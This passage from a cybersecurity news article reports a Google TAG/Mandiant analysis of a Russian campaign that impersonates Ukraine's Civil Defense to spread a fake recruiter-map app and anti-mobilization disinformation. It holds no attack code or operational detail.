"Consistent with the functionality advertised on the \[legitimate\] Civil Defense website, Sunspinner is capable of displaying crowdsourced markers with the locations of the Ukrainian military recruiters, with an option for users to add their own markers," according to the Google TAG analysis. But the fake map offers only fake locations: "However, despite possessing the limited functionality required for users to register and add markers, the displayed map does not appear to have any genuine user inputs. All markers present \[were pulled from the attacker's C2 and\] were added on the same day by the same user."

**Parallel Anti-Mobilization Effort Against Ukrainian Military**

In tandem with the espionage effort, the other goal of the Russian fake Civil Defense campaign is to deliver disinformation aimed at suppressing Ukraine's military mobilization effort for the war. The malicious versions of Civil Defense's site and Telegram have pushed out videos with incendiary, anti-Ukrainian-military titles like, "Unfair Actions From Territorial Recruitment Centers," the TAG Mandiant report added.

Users who click on the button provided by the Russian hacker-operated site to "Send Material," ostensibly to discredit recruitment efforts, are automatically fed an attacker-controlled chat thread," the report said. "Anti-mobilization content cross-posted to the group's website and Telegram channel appears to be sourced from wider pro-Russian social media ecosystems. In at least one instance, a video shared by UNC5812 was shared a day later by the Russian Embassy in South Africa's X account."

Russia has consistently used cyberattacks as part of its war strategy against Ukraine, as well as against other governments, including a recent distributed denial-of-service (DDoS) cyberattack campaign against shipping ports in Japan. Russian hackers have also been working feverishly to distribute disinformation ahead of the US 2024 election. The threat group currently understood to be most actively, and directly, supporting Russian military activities in Ukraine is Sandworm, but, as this newly uncovered "Civilian Defense" campaign highlights, that's just one of many hacker groups doing the Kremlin's dirty work in cyberspace.

Tag

#windows